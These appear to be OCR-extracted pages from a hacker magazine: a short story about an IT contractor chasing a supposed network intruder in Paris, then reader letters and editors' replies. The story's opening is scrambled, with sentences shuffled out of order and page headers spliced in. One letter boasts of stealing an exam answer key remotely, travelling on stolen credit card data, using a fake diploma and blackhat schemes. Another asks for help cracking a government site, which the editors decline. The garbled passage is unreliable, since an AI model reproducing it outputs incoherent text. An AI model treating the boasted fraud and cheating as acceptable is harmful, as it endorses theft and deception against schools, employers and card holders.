I recently watched the video Freedom Downtime. I was the reason it all went sour.” I sat for a moment. “Did you just say ‘police’?” “Yes. “Why would someone want to hack into a cosmetics company? I mean.” my manager said. and it reminded me of a hacker alert that I got involved in. My first guess was that one of our own people had messed up somewhere. I need to get everything done before we close for the holidays. All you’ll need to do is to document the background–everything the help-desk and support people have done so far–and then hand it over. that’s not possible. “This has the highest priority. I couldn’t get stuck on this job. and there was a silence while I tried once again to get my head around it all. and the bottom of the helpdesk fault list. and up to that point I had managed to maintain a blemish-free record. Though I have never done any hacking myself. “but I’m stuck on project work that I need to finish before my Christmas vacation. The only sightseeing you got to do was the inside of a server room. I had to get out of going.” “Not like this. “You know. I’d been with the company for sixteen months. and what the client is seeing is a side effect. The client has already called in their lawyers. Can you do it?” “The service agreement is probably workable.” I didn’t quite laugh. Anyway. “Yes. and the client does have a hacker in the network.”
S H A K E D O W N
Fiction by Peter Wrenshall
“We have network problems all the time. Most people would have probably jumped at the chance of a paid break in Paris. The SA on this is Friday. “Sorry.” I said. In the end. I was the last guy to touch it. I was working for an IT support firm. in fact. The client already has you on an early flight. that would give me time to remote in. Someone is targeting executives. The missile missed the target. and now they’re talking about bringing in the police. do they have any evidence?” “They’ve had a series of network issues . I wasn’t sure the client had been hacked.

just as you were packing up. ready to get out the door. saying that neither they nor the French consultant had found any technical issues. On the way up to the top floor. though obviously not happy enough to smile. Maybe. On the wall was a photo of a French actress I had seen in a movie a few months before. things started to get interesting. When the pilot announced there was going to be a delay. And. the company. and marketers dared to dream of agency kickbacks from the supermodels who would get paid millions to be seen wearing it. rather than playing the game. and I said that they would have their hand-over document by Thursday afternoon. We all got drinks. to my surprise. I landed in Paris just as it was waking up. eventually. I was met by the head of security. and they had nicknamed me “100%. She asked me if I wanted a drink. he told me how “urgently important” it was for the company to get this problem dealt with as soon as possible. he thanked me for coming and said that the CEO wanted to see me. She was modeling the company’s new eyeliner. and. had to pay for a French consultant to go in and do his own tests. who started using phrases like “breach of contract. Clients were always doing that: finding new problems. I only had a few days to get involved. As expected. but I had already decided to go one better: I would write it up for myself. The security guy fired questions at me. and all the rest of it. They reported the “crash” to the help-desk. a duty of care for both the network and the commercial data on it. it wasn’t that far off the mark. At that point. and then we sat and chatted. which I fielded. which was about a network breakin. So I knew how to invent work for myself.
205
. We walked and talked until we got to the executive area. and threatening the shift manager. In the previous six months. it got explained away as a network glitch. and then she surprised me by saying. and by 9:12 I was sitting in the reception area of the client’s office.” For a moment. They wanted reassurance from me. And for a little while. And then. neatly dressed woman in her forties who said that she was happy to see me. it looked like there was a hacker in the network after all. there would no doubt be an opportunity for me to get unofficially involved. I thought that something must have gotten lost in the translation. everything was quiet. The tests turned up nothing out of the ordinary. I said yes. Hackers were still very much in the public interest. I nodded. A few minutes later. a place where every stuffed suit had their own office. getting an “insider” view. and that seemed to satisfy them. She tried a few remedial actions to rescue it. Fired up. More tests and scans were run and. Interesting. The CEO was a tall. “I am told you are the top guy in the computer department. despite my initial cynicism. Then I realized that my boss had obviously talked me up. I might even end up working with the cops. and since then I’d been thinking about doing something similar. waiting. who remoted in and ran a bunch of tests to see what was wrong. I had not missed a single project deadline or failed a help-desk SA. It had all started two months earlier. But a few days later. They persuaded the CEO to call in the French equivalent of the Cyber Crime Division. it at least stopped the suits from barking. If I could get a publisher interested in it.VOLUME 26
was on a plane. the lawyers started talking about network security and hackers: cosmetics companies came out with new formulas all the time. True. I had read a best seller. the sharks said. and I noticed the tagline was in English. this could be my ticket out of computer support. the CEO had been working late when she got hit by it. or Friday morning at the latest. when a couple of executives had suddenly and mysteriously lost the documents they had been working on. except his invoice. So. The help desk was getting endless complaints. And while he came up with nothing suspicious. But over the next two weeks there were two more incidents. the same thing happened to half a dozen other management stiffs. Years before.” The company fired back. but dead is dead. this corporate hack that I had stumbled onto was my material. Then one night. putting it all into a book. and I knew there was good money to be made out of the talk-show circuit. and began to read up about the saga. the client escalated the problem and we. to try to calm her. I’d be switching to a new career. My manager had asked me to write it up. but a quick trip to the server room to make a few unofficial “adjustments” would solve that problem. in shaky English. but in French. At that point. Here was the top of the fashion world. since I would be staying in Paris for an extra couple of weeks. noncommittally. dressed in my good suit and the duty-free tie that I bought on the previous trip. telling me about how they felt let down. and some of them were worth millions. and the incident was eventually put down to a “cockpit error” (help-desk code for user stupidity). taking the “business critical” document she had been working on with it. Everything had been locked down for days.THE HACKER DIGEST . The other staff thought this was hilarious and assumed that I was some fanatic. But I still had memories of pedaling to work in the rain to keep me overachieving. If I did things right. I took out the help-desk logs. The Cuckoo’s Egg. The next day she called in the lawyers. and then the CEO took her turn. including screaming at the help desk.” Nothing gets office clerks talking more than the presence of someone who is working his way to the top. We had. Besides. The error messages told her the network connection had died. though I had seen the same ad back home. they unburdened themselves of their frustrations. I got out my laptop and started a journal. and that started phones ringing. and every office had its own unique personality. where visionaries dared to dream of a redder lipstick. I thought. He was stocky with a shaved head. so I would have something to refer to when I got home and started writing my best seller.

Full marks pour moi. The more fashions change. I made a start on my own unofficial investigation. The local skeleton crew IT staff said bonjour. After dinner. “I have to check the network ports. or the new woman who had just started working in the
206
. Inside were the familiar rows of network switches. The next day was a carbon copy of the first. “I’m sorry. and watching white flakes slowly drift down out of the darkness and onto people as they darted in and out of shops and restaurants. but the French language being what it is. but it was just a better class of boredom. I went downstairs and fired up the word processor. It looked like someone had translated the headquarters of a Bond villain into French. at 1:30. They were obviously both in the wrong place: the last things they needed were cosmetics. getting nothing but green lights. Was something loose somewhere? I tugged a few cables. I decided to get something to eat and followed the signs to the cafeteria. the tests showed there were no defective ports. as expected. I told the CEO and the security guy about my reservations. Apart from the clinking of cutlery.VOLUME 26
And yet. I would walk around the exec suite with a port-tester. as I sat there chatting professionally and sipping café au lait that tasted far too good to be decaf. The dark-haired one said something to me. To try to work it out in my own mind. I went into an explanation of the difference between an organized criminal who was in it for the money and a computer hacker who was in it for the technology. I began by visiting each of the comms rooms. organized or not. and when the person was caught. At the table were two women. I’d never stayed in such an upmarket place before.” the CEO said. Welcome to the exciting world of cosmetics. and I was going to ask them where the famously romantic part of Paris was supposed to be. and patching all this together was the usual spaghetti of network cables. I spent another half hour sitting on a snow-covered bench in the middle of a square. mixed in a few buzzwords. It was a large room with a polished wood table in the middle surrounded by stylish chairs. I put all the boring details of the day into my takedown diary and. One of the rooms was a conference suite. trying to remember some school French. and. added some topology diagrams. and was looking forward to it. I wandered through empty rooms. The bad guy was wearing a tall black hat with a buckle on it. I started with the firewall and server logs from the time of the events. I ate my sandwich. Hundreds of years ago. at 6:00. I thought. before settling down to do the documentation. he would be sentenced to hard labor. and the women he was waving a bible at were all wearing bonnets. I decided that since I was on the top floor. From the way her dark eyes were blazing. and then. this room is not available now. All the smart comments about French women that I had heard before I left the office were wasted. On the wall was a massive flat-screen display. just put her hands on her hips. He sat me in front of someone’s desk. my official task was nearly complete. and took me down to the IT support room in the basement. Every day there was some new story. After that. My little investigation had failed to throw up any obvious errors. as we stood and shook hands. Something about what they were telling me didn’t quite fit. with their blinking lights and whirring fans. “There is a lot at stake here. I heard some tourists speaking English. “Pardonnez-moi.” she said. “Parlez-vous anglais?” She didn’t answer. everything was in order. “Please come back after one o’clock. Very little happened.” I dropped the CEO’s name into the conversation. The two women had gone and. and I started thinking about hackers again. because I still had the documentation to write. this spot had been the site of a famous revolution.” I said. and then hand it over on Thursday. At home. and realized that it was already afternoon. hoping to impress. I sat in a deserted hotel bar for an hour. but all that did was make the dark-haired woman bark louder. the place was as interesting as an insurance convention. who then turned to me. and my initial doubts about them having a hacker returned. and half of the cabinets had no doors on them. I decided to continue digging later. there was always plenty of gossip in the office. the two local support staff members were nowhere to be seen. the more they stay the same. After that. in the basement. and then he went away. I emailed my manager to let him know I had arrived and. A few hours later. about salesclerks going ape and throwing the company laptop at the wall. But apart from the fact that there were various bits of abandoned gear left lying around. All I had to do was proofread it tomorrow.THE HACKER DIGEST . and then went to my room and watched a movie about the first American settlers that was badly dubbed in French. We are counting on you. and looked at the other woman. I guessed the former. but everything seemed peaceful enough now. The other woman turned to me again and said. and then wedged it all on the company stationery. and then both of them withdrew to the other side of the room. Then the security guy handed me a pass. But they weren’t interested in theories or subtleties. I thought. she could have been swearing at me or she could have been reciting poetry. they said.” I looked at my watch. but they walked past. sipping decaf. I left my laptop monitoring the network and took a taxi to the hotel the client had arranged for me. obviously happy to leave me to it. which meant the hardware was working as it should. It will only take a minute. This was France. which were placed next to the emergency stairs on every floor. I went out and wandered around Paris in the dark for an hour. since I had to rule out everything. who both looked like they had been Photoshopped into their business suits. some alarm bell was sounding far off in the back of my mind. I went back to the conference suite.

and was just thinking “101%. but my brain couldn’t follow. I’d almost come to the end of my stay.” I said. and they kept me waiting while they read it. Shortly afterward. and that I would see him on Monday. Whatever was going on. What else could I say? He continued. and I hadn’t seen any black hats. when I noticed something even odder. out of sight.” I continued.”
207
. I got to see the CEO after 10:30.” “But all the switches have been tested. and. I could see my breath in front of me. but the cold wasn’t bothering me at all. and sat in the silence. “It’s a good result. Someone else was in the room. and looked again. and then turned back to me. when I saw that a large segment of the top-floor network had vanished. caught completely off guard. and sat on it for an hour. I gave them each a copy of the hand-over document. I jumped up and sprinted out of the office and up the emergency stairs to the top floor. It was not going to be enjoyable. He had already heard from the CEO. “Er. only this time he accompanied it with a sound like “poof. looking for a vending machine. “No need for that. it is an inside job. I went back downstairs. I took a taxi to my Paris bench. to show to the police. and just said that I had looked for technical faults and only found an unpingable DNS.THE HACKER DIGEST . An image kept invading my brain. trying to figure it out. How much of the other stuff I’d read about hackers was just as hyped? Hysteria sells. and sat down at my desk. I got a call from the CEO. A man. but I wasn’t in a rush to get back to my hotel. for some reason. After he had hung up.” I was just about to bark. “Yes. So much for the big hacker takedown. Note to self: don’t drink the Kool-Aid. I noticed that one side of her silk shirt was untucked. got to the comms room. And then I saw something else. It was after 6:00 when I noticed the time. The woman said nothing. The day was ten hours of silence On Thursday morning. “We needed some evidence. and their expressions didn’t need translating. I sat and typed all day.” “You were supposed to document the problem. my phone rang. Whatever had been knocked loose was back up again. The woman was staring at me with those big dark eyes. it was gone. And I knew what had been interrupting the network service.” said the security guy said. which by then had turned into a full-on novel. pardonnez-moi. and walked quickly back down to my desk. I paused for a moment.” “Defective?” the CEO said. She didn’t appear to be breathing. A woman was standing in front of the first rack. “because now you don’t need to call in the police. so I hung around. and that sort of thing. and found her and the security guy waiting expectantly. It was the woman from the conference suite on the first day. I will call the manufacturer and have it checked. “Broken.” “Okay. I got to my desk. and I realized what it was. Maintenance contract. and I was sitting there with no idea what to do. watching the people go past.” I said. The security guy was already there. not fix it. The thing I had been waiting days to see had happened at last. “Why would you want the serial number?” “Because the hardware is protected by a maintenance contract.” The security guy and the CEO looked at each other. She had a surprised look on her face. and realized that I hadn’t eaten. and how sorry they were to have dragged me away from home at this time of year. but I don’t understand. At the top of the stairs. I was about to find out. Not even slightly.” I said. since real life hadn’t been interesting enough to fill a book. he looked at the CEO. I went back to the office. “What are you doing in here. but didn’t find one. and he was calling me to congratulate me on hitting another SA. they thanked me and said that they appreciated the work I had done. “My initial thought was right. I backed out of there.” I replied. “Sorry. I was just about to turn off my machine and go to the hotel. and then went outside.” “Yes. “Yes. not getting how I was missing the blindingly obvious. I could see a reflection. pushed open the door. happily inventing exciting scenes. and wouldn’t go away. I ran through the doors. In the dark glass of one of the cabinets.” when I saw something odd. Nobody said anything. “I’ve retested the network and found the problem. I walked around the deserted corridors. I’ve already fixed it. It wasn’t a hacker. and why it was only the execs who were getting hit.” “Fixed it?” Puzzled. I didn’t tell him that I’d been snooping around like the Hack Finder General. I stood there for a moment. What was bothering me was what the thought of the next day’s work. I went to her office. Are you telling me you just got rid of the evidence?” He made the open hands gesture again. and the network was fine. And I had almost bought it. the one with the dark hair. Yes. I switched off my laptop. It was my manager. But there was no danger of that here. After they had finished. standing behind the rack. and checked the network monitor. and wondering which actor would play me in the movie of the book. Right. My first thought was.” the security guy said. filling in my hack-attack journal. If you give me the serial number of the switch. blinked. with open hands. after all. At the prearranged time. her shirt untucked.VOLUME 26
office. her gorgeous face flushed.” Call the manufacturer? I stood there. just a defective network switch. She didn’t move. an image of that woman. I recognized her right away. He wanted to know if I had done any additional investigation. They said that they would let my manager know that they were pleased with the service. And then it dawned on me.

and I didn’t blame him. I noticed that a woman was standing next to me. and there was another conversation in 56k baud French. and after some negotiation. “But I do not understand. and gestured for her to go ahead. When you’ve had the finger pointed at you. One of the office jokers. Then she turned to me. “Enchanté yourself. and then turned back to me. however I phrased it. But I’ve cleaned it now. The breakfast crowd had already gone. “Will you be visiting the Le Mas district?” “I hadn’t planned to. made me sound like a goon. It was something else.” I knew that as soon as the door clicked shut behind me they’d be on the phone to my manager. “I have to say that I am disappointed. “Dust was blocking the fan. but I could see right away that this was one SA I was definitely going to miss. Are there any good restaurants?” “Oh. It was a good job I did. I generally leave that sort of thing to the politicians. The CEO slit her eyes and frowned. “Enchanté. She spoke slowly and quietly: “Is there something you would like to tell us?” It wasn’t that I cared if the cyber cops charged Mademoiselle Hacker with killing business critical documents. “How can a broken switch cause such problems?” It was a good question. Hardly anything has changed over the years. I told her. “I would like you to provide me with an email explaining everything. My flight was more than eight hours away.” The CEO and security guy had a French conversation that was so fast it sounded like two modems talking.” she said. the one who had been working with Mademoiselle Hacker. “What I don’t understand is that you didn’t think to tell someone before you destroyed the evidence. just to do a final check.” she said.THE HACKER DIGEST .” “I’m not working this weekend. I made another note to myself: get a life. It said: 99%. “So what you are telling me is that you cleaned the dust out of a fan. No. I’d get a cup of real coffee.
Have an interesting fictional story concerning hacking that you’d like to test out on our readers? Send it on in to articles@2600. and then head to the airport. I had to. My phone beeped. before you go home.” After I had finished my cup of coffee. . and then burned her at the stake. “I don’t drink tea. and that my record now had a large black mark against it. “Too bad you are working. I said that I would try my best. It has lots of history. finish the email. and now there isn’t any problem? And this will not occur again?” “Yes. I cringed while giving out this garbage. “Will you be in Paris long?” “A few days. “What part of England are you from?” she said. but I wasn’t about to hang around. He wasn’t buying it.com.” She did one of those French gestures.” she said. It was my manager. I confessed everything.. but had failed. The whole thing had caught me out. to tell them what had really happened. I had a message. I stood for a minute. and smiled. looking grimly at the cup of hot water and thinking things over: all work and no play makes Jack a dull geek. without coffee. yes . Is it nice?” “It’s wonderful. I stepped back. I felt some sweat roll down my forehead.” I said. and got a cup of steaming water. I went back to the honeymoon suite and went around all the cables and power connectors. “No tea?” she said. I turned around and realized that it was the woman from the conference room.” “Yes. Anyway. For an hour afterward.VOLUME 26
“Sorry.” “Sounds interesting. Suddenly. and the place was silent. “Paris is lovely at this time of year. I looked at my watch. As I was leaving.” She smiled again. Completely random. incredulous. because I spotted a couple of server issues that had somehow previously been overlooked. typing an email that. my phone rang. and then stopped. Then she turned back to me.” Naturally.” She placed a cup in the machine. putting her curves between me and the coffee machine.” I started. and all last night I had been trying to think up some believable explanation that fit the facts. I was having a mal jour. and read it. . it gets more difficult to do it yourself. That’s right. Sightseeing. She turned her head.” The CEO looked puzzled. as if she suddenly had an insight. I could imagine the jokes when I got back to the office. “Fan?” the security guy said. too. and got a sermon about the importance of not annoying the customer. Please tell us it’s fiction so we don’t inadvertently spread a pack of lies. I phoned the help desk to report the problem. I sat at my PC. looping her hair around her ear. pushing in anything that might have been knocked loose.
208
. and inclined her head. making it run hot and act flaky. so it’s okay. I opened it.” “I. The CEO gave me a look that was colder than the snow outside.” “But you are English. I took the stairs down to the cafeteria. I shook my head. I went to the coffee machine and pressed the button. and got coffee. hit the button. they said that they wanted me to get the work completed by Monday at the latest.” The security guy continued. I was going to level with them.. I took a last trip to the server room. looking at my cup of water.

running BBSes. In this age of the expert. Eventually. I know this problem all too well. and see if they can recommend you to customers asking about custom programming jobs. I was able to take a job in the tutoring department and included programming as subjects I could tutor. Short of a few unionized trades. skipping ahead to end-of-the-year more advanced topics that I was truly interested in. The problem was nobody in the class could finish the last question on the test as it was too difficult. Oops. I realized I didn’t work hard enough and was unable to finish because I couldn’t come up with my own equations. but the two year degree was more hands-on and offered a stronger computer hardware curriculum. doing acid. So during the test I remotely logged into the professor’s desktop computer and stole the answer key. My complete hatred of all institutional settings caught up with me and I lost interest in the material. leave them your card. but some employers strictly want that degree. Things can be difficult when you have neither. You can usually substitute experience and good references for the sheepskin. You just have to find one where you can get your foot in the door. I moved on to a software engineering job at another company. I have 20 plus years experience doing programming but my degree was originally an A. I was too busy breaking into telco boxes on the street. there’s a letter from a 27-year-old hacker who is unable to get a job due to not having the proper piece of paper declaring his skills. and Canada to bother showing up to school and I was kicked out.000 to pay back.VOLUME 26
Random Advice
and contract-to-hire jobs to build up your work experience. In the early 90s. but had to work hard on the nontechnical stuff.) So I finished a GED and started going to a local tech school.S. Vocational schools were labeled as the places where the trouble-making students went to learn trades instead of places to become experts in their field. being a 30-year-old hacker without “formal” education. Being that a school professor is not an idiot. and decided to go the mainstream route of formal education if I was to have any hope of paying off more than the interest on this fine. I also recommend checking with any smaller computer shops in your area. After 15 years. I had a job as an electronics technician. LETTERS
Dear 2600: This letter is in response to the letter by Psion the GateKeeper in issue 25:3. I was one of three students hired by a major electronics firm that came to recruit from the school. My ability to rapidly learn on-the-fly allowed me to learn and help at the same time while making money. my solutions were displayed with an overhead projector for all the class to follow. Unfortunately. Your best bet will be to look for temporary
THE HACKER DIGEST . took vocational electronics in high school. (Bankruptcy was not an option. Certification courses have been dismissed mostly due to a few unscrupulous operations where they were handing them out without proper teaching and testing of skills. in electronics. I could have taken a four year degree and become an engineer. Good luck. At graduation. I was able to cruise effortlessly through the electronics courses. and using stolen credit card information to travel to Atari Teenage Riot and Jello Biafra shows all over the U.S. I was busted for obvious cheating and pretty much banned from every school in
209
. I concluded I was screwed. I started playing with electronics in the fourth grade. so since I was the only successful student. Get to know the owners. The group I worked for quickly learned of my computer expertise and had me building embedded computer systems and eventually the software that ran on them.LETTERS. Computers have infiltrated almost every occupation. and then let your skills be known by being in the right place at the right time to save the day. LETTERS. Exothermicus Dear 2600: In the Autumn 2008 issue. apprenticeships have become all but unheard of. When I wrote the final for my C++ course. then went on to a local university for their electronics degree. Stick with it. vocational schools and certification courses have gotten bad reputations over the years. I was left behind because of not having any credentials. I was caught for this and slapped with a fine of $40. Companies are more willing to take a chance hiring a temporary worker than a fulltime employee.

This left me working menial jobs while making adequate money on the side from blackhat SEO advertising revenue. I was still at the bottom of the IT pile. but this time with a vengeance. even if I’ll never be the ideal corporate employee that asks no questions and quietly toils away in obscurity. Miraculously. Hard work also gave me a new respect for traditional education. It’s risky job security. Although I recommend you try the formal education route to gain valuable networking connections (these contacts being the student sitting beside you in discrete mathematics that’s also interested in hacking Google T-Mobile handsets) and that ever-so-important piece of paper that basically says you can fit into corporate lifestyle.MIT’s free open courseware at ocw. I would show up and ask the other employees if I could shadow them. Sadly. If you’re fluent in a certain programming language. and aren’t just another drone looking for a paycheck. start your own minicompany or hacker space. as I ended up right back where I was after being fired due to a really stupid Facebook incident regarding pictures of me doing random drunk shenanigans with friends. so this also helped in my job search. but it still wasn’t enough and soon I was drowning in debt once again. make an offer to the department head that you’ll work for free for a week and if they like what you’re doing. This propelled me up the ladder exponentially to where I was finally in a “real” job. So I’ve excelled. but gained the position by appealing directly to the union with a desperate sales pitch delivered while I showed up to all of their events.THE HACKER DIGEST . but profit will be epic and you will be in charge of your own destiny. this time without cheating and excessive partying that doomed me the last couple of times. Good luck. as most companies want to work with contractors instead of employees.xml) since he talks to these very HR clowns that hold the destiny of your life in their hands. Generally. and I decided a triumphant return to University was in order. In despair. with no credentials. and disciplines I was fluent in for employers to see I was actually busy doing something after being banned from school. The next step was to become accredited through certificates such as CompTIA. approximately in his 70s. making actual money the legit way. and that I was interested in what they were doing. this sight means I’ve got an easy job of BSing someone who knows very little about the technology into buying the most expensive one and often even getting them to pay us a couple hundred dollars to plug in the three
Random Observation
210
. draw up a simple contract and I guarantee they’ll sign it. you can always appeal directly to the company’s department head to hire you like I did with a portfolio and complete gonzo style during the interview.mit. This proves you have passion.htm. but I wasn’t satisfied with waiting forever for better pay. Some companies still appreciate these kinds of employees. and in heavy debt. ca/podcasting/xml/careerfasttrack. this time to lawyers.citr. I didn’t even have enough credentials for this lousy blue collar job. staring at the wall of DVD players/recorders. I was working in the home theater department when I noticed an older gentleman. Then I created a portfolio of all the hack tools. most companies won’t let you touch computer hardware without being A+ certified because of warranty issues. It worked. so why shouldn’t I try it?).VOLUME 26
my province for five years. I survived by hiring excellent employment lawyers and was back to being jobless. Or better yet. I obtained a diploma through a diploma mill and conned my way into a variety of tech companies (fake diplomas worked for the entire Bush presidential staff. A Harvard style resume (Google for it) increases your chances of being chosen from a pile of applications by 40 percent. Simply showing up and talking to somebody worked. and my complete lack of discretion and careless anarchist self-destructive philosophy soon saw me in legal trouble again. How do I manipulate this technocrat from the HR department sitting across from me in the interview who’s analyzing my every move with complicated statistical “measures” to see if I stack up to their abstract hiring formula? I found a radio show on a local University radio station put on by this guy (Philippe Desrochers) who has excellent insight if you ignore most of the corporate rhetoric (playlist. Then I found this site . The corporate world is just a game similar to the court of French kings . I needed to find out everything employers are looking for when they interview you or look at your resume. and went back to social engineering skills I learned from Kevin Mitnick’s writings and combined them with career advice given by the above radio podcast. Although this provided me with better income.edu/OcwWeb/web/ home/home/index. I needed to climb the ladder. My purpose was to collect intel on these corporations for maximum blackhat financial exploitation.everybody swirling around whoever has the power trying to win favor through any means necessary. First. The physics lectures fascinated me. I decided I needed to find a way to hack the workplace and get a real job. I turned to the fortress of solitude that is unlistenable black metal and returned to blackhat activities. Jesus Bonehead (604) Dear 2600: I work at a major retailer in Florida and came to an interesting realization the other day. This was not to be. and contract yourself to these employers. and I quickly worked through every online course I had time for while working a terrible blue collar job that provided adequate but legal income. research.

It just doesn’t pay the rent.some others couldn’t be exploited remotely. So if you fucks ever fuck with [email address deleted] again.4 is current. and ages. he was a hacker. Neito You can also express that love by coming to the next conference in 2010 or by continuing to support us in other ways (such as a full HOPE DVD set).THE HACKER DIGEST . Nothing in this letter should be taken as disrespect to the excellent FreeBSD project or team. I just want to mention the benefits of this alternative for the sake of choice. But plain love with no monetary transactions is good too. Many of the OpenBSD utilities are used in other BSDs (to include Darwin/OSX) and in most (if not all) major Linux distributions. then please do a little homework to explore your choices before defaulting to FreeBSD.. Compare that to your favorite operating system. I suppose. in fact. everyone interested in anything has to start somewhere) are even aware that there are open source BSD alternatives to FreeBSD. the Packet Filter (pf) firewall. thus taking the copyright out of the equation. between 1997 and 2007. then great! Stick with Linux. One good resource when choosing a flavor of open source BSD is Wikipedia’s “Comparison of BSD Operating Systems.” he said laughing. Happy Cracking! Clay Lakeland. I said to him “Happy cracking!” He turned and gave me a confused and/or intrigued look and asked what I meant. I walked up to the gentleman and asked if I could help him out. Whether you know it or not. it is the only flavor of BSD whose top goals include security. CARP. and some of those wouldn’t affect a default installation . R. Some of these utilities are included not only with Cygwin. He said he had flipped through it at Barnes and Noble a few times but never gave it much thought. OpenSSH. I guess the moral of this story. you’ve likely used utilities and technologies that are available only because there is an OpenBSD project (even if you’re in a Windows-only environment). Have you ever used OpenSSL. At this point. He was curious about being able to record onto DVD directly from TV. You may well have helped us grasp how it can suddenly seem like a good idea.3 on May 1. I told him that. If you want to try BSD. which yields advances in other sciences such as medicine and computing. we came up with a plan using the equipment he already had to run the feed from his TV to his HD camcorder and then onto a DVD from there. we’ve certainly been told. He was happy and we both seemed pleased with ourselves about how we had outsmarted Sony’s silly copyright programming. I was more interested in helping this fellow out than selling him something as I was made aware that he wasn’t as technologically illiterate as I had assumed. He was apparently attempting to record the inauguration of Obama the previous week (I won’t hold that against him) and was informed by his Sony DVD recorder that he was unable to record due to copyright protections. only eight security advisories have been identified. was that hackers come in all shapes. or the Blowfish/Twofish encryption algorithms? Those are just a few of the goodies that have come from the OpenBSD project. my observation is that the answer is very few.” What attracted me to OpenBSD is that. FL Dear 2600: I just wanted to say. “I guess you’re right. He decided he was going across the street to pick it up on his way home.
Random Remarks
211
. then read on! Since the release of version 4. then stick with that. I think you people are crazy for not charging money for the HOPE MP3s. Whatever it takes to get ahead.5 is in release candidate status). Dear 2600: How many hackers and sysadmins interested in exploring BSD ever even consider anything but FreeBSD? Having been around various UNIX forums for quite some time. I had a break in and McAfee has now secured my site. If you’re happy with Linux. you are fucked! Jesus Montoya Well. Eventually. and what caught me off guard with this fellow. but even with Microsoft’s own Windows Services for UNIX. In fact. sizes. but anyways. Like space exploration.VOLUME 26
wires. But I love you for it. Toby Richards You make a good case. OpenCVS. OpenBSD gives us tools that we’d otherwise not have. I doubt many novice BSD adventurers (“newbie” has become such a derogatory term when. which I admit has a much cooler mascot. It’s always been hard for us to understand what motivates people to release viruses and do other malicious and stupid things. and 4. So he was looking for a way to get around that. As he was turning to leave. OpenBSD only had two remote exploits. But we fear you may have fired the first shots of an OS Holy War in these pages that we may never live to see the end of. If you’re reading 2600 because you are interested in security. whether he knew it or not. I suggested he try reading an issue and explained the mag a bit. And it’s never too late to start. I asked if he had ever come across 2600 in his travels.. If you’re happy with your BSD. 2008 (4. unlike its cousins. Dear 2600: You guys are a bunch of pussy want a be hackers that haven’t hacked anything in years.

we’re optimistic that the community will continue to support whatever projects come along as the landscape changes. Middle Island. assuming you don’t have a lot of complicated charts and diagrams (which most letter writers are able to get by without). let the world see exactly what they’re saying and use another forum to tear it to pieces. I was wondering if 2600 shares any
. This illustrates one risk of blindly lashing out at websites that supposedly represent your enemies: sometimes you get it wrong and wind up hurting those you’re trying to help. payphones@2600. It’s one thing to hand over one’s banking information (which we are sending you as a courtesy). I just emailed a letter and fear it may have hit your junk box. not only in mainstream society but in the hacker world as well. DANIEL OBORI NIGERIA For some reason we get at least one letter with this exact phrasing every week and almost always from Nigeria. Still think your magazine is the greatest! The Scorpion One thing we learned while assembling the book (“The Best of 2600. Dear 2600: Hey. which advises people submitting letters and articles to avoid weird-ass formats that may be easily readable on one machine or OS but not on another. But this takes a lot of work on our part and we need to know there’s a desire for this and.com and tharkinwe.com is the correct address. Dear 2600: I’d like to submit some photos of phones and an interesting story as well. not least.com. There are those who would say that this is somehow part of some kind of a scam. ASCII (which. Dear 2600: Hello.com. If you have. But we still want to make sure that it’s available in as many places as possible since this really is an incredible tale of history we’ve been telling since 1984. Just be sure to include your subscriber info since only subscribers can advertise there. not the government. As this is how we’ve survived for a quarter of a century. stands for American Standard Code for Information Interchange) is simply text and it’s readable on any machine. but I did see this with the audio show. Rather than silence those views you find to be repellent. But the real reason why simply shutting down or attacking these sites is ultimately pointless is that it keeps the real issues from being addressed. Dear 2600: Hi. Dear 2600: I am a life member of your fine magazine. Could you thus ship me specimen hard copies for evaluation? Thank you. Resorting to those methods yourself doesn’t convince anyone of how wrong they are and likely will even win them some support. In the end. Jason Liszkiewicz It’s mentioned at the very bottom of the section and. We have therefore sent you one copy each of all issues of both 2600 Magazine and The Hacker Quarterly in the hopes that you will evaluate them and let us know of your decision. And now the wait begins. Is letters@2600. we strongly suspect the second site is part of the opposition. I was just wondering if you have ever thought about making either a CD or DVD of all your past issues for sale? I have never seen one before. If we spend the time and money to do this right. It makes our lives a bit easier here and.com the right address to send them to? userguid If you’re submitting the story as an article. but to simply ask for specimen hard copies seems harmless enough. These are the propaganda sites of the most vile government on the planet and they should not be representing the people of Burma. please guide me in finding assistance in cracking these websites. yes. As for payphone photos. you can email your marketplace ads to subs@2600. though. it can only continue if people buy the CDs/DVDs as we have no advertisers to pick up the slack. Please try and submit to the appropriate address to avoid delays and confusion. I do not see any mention in the marketplace section that I can send an ad through email instead of sending the ad to PO Box 99.VOLUME 26
Dear 2600: I wish to contribute as well as subscribe to 2600 Magazine and The Hacker Quarterly. We find that often the best way to win a fight is to simply let the other side speak. I seem to have for-
Random Questions
212
gotten. otherwise the address you used here (letters@2600. The book has helped to bring a lot of this material into the light again. Dear 2600: I’m seeking help in cracking a fascist government website known as myanmar.THE HACKER DIGEST . a commitment to support the effort on the part of the community. count me in for a set. it’s perfectly suitable for letters and most articles. We do forgive the occasional transgression. then articles@2600.com is the place. Shutting down dissenting views is a tactic used by oppressive governments worldwide. Everyone gets one. Kindly. we do want to make these issues available in an electronic medium. misterht01 First off. incidentally. we all benefit from this.” now available in regular or “collector’s edition” at fine and not-so-fine bookstores everywhere) is that a lot of really good material was all but forgotten. but we just don’t buy it. So yes. com) works just fine. WTF is ASCII? William Sounds like you read our auto-responder.

even if we previously have touched upon a subject. really. You saw a particular setup which didn’t give you voice permission by default. what satellite(s). you’re in the right place. I’d like to know more: how they’re used. and who is on the other (head) end. but it could possibly be a terrorist. data formats. I imagine they’re somehow involved in processing credit card payments. You asked some random person what the reasoning behind it was. But before sending it in. Dear 2600: At the moment. Dear 2600: Many gas stations here in California and elsewhere sport large parabolic satellite antennas on their roofs. This is indeed how the thought process in the world of IRC works. Jack Let’s follow what happened here. a Drobo replacement and optimizing TrueCrypt. We’d like to help everyone out. But we just can’t in good conscience reveal any bit of information about anyone having to do with any of this.net servers which basically means you have the best chance of being treated fairly there since we know and trust the people running the network. If privacy is important to you. Please get back to me when you can. #ca2600 and was informed that voice status means you are not a newb. We never have and we never will. And you’re free to publish your article wherever you want after it’s printed here. Art Smass The various networks of communication that exist under our noses that most people know nothing about are truly fascinating and we hope to see an article detailing this one in the very near future. I would appreciate it if you could unban my address. But we can’t force people to be as careful as we think they should be. There are an infinite number of chat rooms that have some sort of 2600 connection but we can’t (and don’t want to) operate them all. so I joined another channel. so don’t let that be the deciding factor. Is this what’s known as VSAT (Very Small Aperture Terminal) equipment? We Await Silent Tristero’s Empire. Someone else is also using my nickname. They’re clearly not for receiving TV. When you get this message. I would like to know if this topic was really never in one of your issues. job opportunities.. they would want to convey all manner of special offers.THE HACKER DIGEST .2600. 